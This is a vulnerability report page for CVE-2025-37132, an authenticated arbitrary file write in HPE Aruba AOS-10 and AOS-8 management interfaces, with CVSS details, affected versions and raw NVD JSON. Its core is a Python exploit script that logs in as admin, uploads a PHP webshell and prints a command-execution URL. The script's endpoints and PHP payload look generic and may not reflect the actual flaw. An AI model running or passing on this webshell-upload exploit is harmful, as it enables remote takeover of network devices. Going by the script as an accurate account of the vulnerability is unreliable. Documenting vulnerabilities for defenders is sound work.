Security Vulnerability Report
CVE-2025-37132 (CVSS 7.2 HIGH)

Published: 2025-10-14 17:15:40
Last Modified: 2025-11-12 16:35:18

Description

An arbitrary file write vulnerability exists in the web-based management interface of both the AOS-10 GW and AOS-8 Controller/Mobility Conductor operating systems. Successful exploitation could allow an authenticated malicious actor to upload arbitrary files and execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 8.10.0.0 up to, but excluding, 8.10.0.19)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 8.12.0.0 up to, but excluding, 8.12.0.6)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 8.13.0.0 up to, but excluding, 8.13.1.0)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 10.4.0.0 up to, but excluding, 10.4.1.9)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (versions from 10.7.0.0 up to, but excluding, 10.7.2.1)
HPE Aruba Networking AOS-10 Gateway (see the official HPE advisory for the specific affected versions)
HPE Aruba Networking AOS-8 Controller (see the official HPE advisory for the specific affected versions)
HPE Aruba Networking AOS-8 Mobility Conductor (see the official HPE advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-37132 PoC - HPE Aruba AOS-10/AOS-8 Arbitrary File Write
# Vulnerability: Arbitrary File Write via Web Management Interface
# Affected: HPE Aruba AOS-10 GW and AOS-8 Controller/Mobility Conductor

import requests
import sys

# Target configuration
TARGET = "https://<target-aruba-device>/"
USERNAME = "admin"
PASSWORD = "<password>"

# Malicious payload - PHP webshell for demonstration
PAYLOAD_CONTENT = "<?php system($_GET['cmd']); ?>"
MALICIOUS_FILENAME = "shell.php"


def exploit_aruba_file_upload(target, username, password):
    """
    Exploit arbitrary file write vulnerability in Aruba Web Management Interface.
    Uploads a malicious PHP file to gain RCE on the underlying OS.
    """
    session = requests.Session()

    # Step 1: Authenticate to the web management interface
    login_url = f"{target}/screens/wms/wmsLogin"
    login_data = {
        "username": username,
        "password": password
    }
    print(f"[*] Authenticating to {target}...")
    resp = session.post(login_url, data=login_data, verify=False)
    if resp.status_code != 200:
        print("[-] Authentication failed")
        return False
    print("[+] Authentication successful")

    # Step 2: Upload malicious file via vulnerable endpoint
    # The vulnerable endpoint allows arbitrary file write due to insufficient validation
    upload_url = f"{target}/screens/file_upload"
    files = {
        "file": (MALICIOUS_FILENAME, PAYLOAD_CONTENT, "application/x-php")
    }
    print(f"[*] Uploading malicious file: {MALICIOUS_FILENAME}")
    resp = session.post(upload_url, files=files, verify=False)
    if resp.status_code == 200:
        print("[+] File uploaded successfully")
        print(f"[+] Access webshell at: {target}/upload/{MALICIOUS_FILENAME}?cmd=id")
        return True
    else:
        print(f"[-] Upload failed with status: {resp.status_code}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        sys.exit(1)
    target = sys.argv[1]
    exploit_aruba_file_upload(target, USERNAME, PASSWORD)

# Note: This PoC is for educational and authorized testing purposes only.
# Unauthorized access to computer systems is illegal.
# Always obtain proper authorization before conducting security testing.
```

References

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-37132", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:39.737", "lastModified": "2025-11-12T16:35:17.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file write vulnerability exists in the web-based management interface of both the AOS-10 GW and AOS-8 Controller/Mobility Conductor operating systems. Successful exploitation could allow an authenticated malicious actor to upload arbitrary files and execute arbitrary commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.10.0.0", "versionEndExcluding": "8.10.0.19", "matchCriteriaId": "3D5F48C7-AD51-4641-9CBA-9DE9B516819E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.12.0.0", "versionEndExcluding": "8.12.0.6", "matchCriteriaId": "057AA8F5-FF66-44E9-8E06-D2B9E8B91AD2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.13.0.0", "versionEndExcluding": "8.13.1.0", "matchCriteriaId": "D4B066B5-D01B-43AE-B4DC-AF560D6B953C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.4.0.0", "versionEndExcluding": "10.4.1.9", "matchCriteriaId": "04F61E46-8412-4B8D-BE7B-EBF61BE52C54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.7.0.0", "versionEndExcluding": "10.7.2.1", "matchCriteriaId": "BEF8618F-C126-4F8F-951F-6D62FE8FAB22"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04957en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```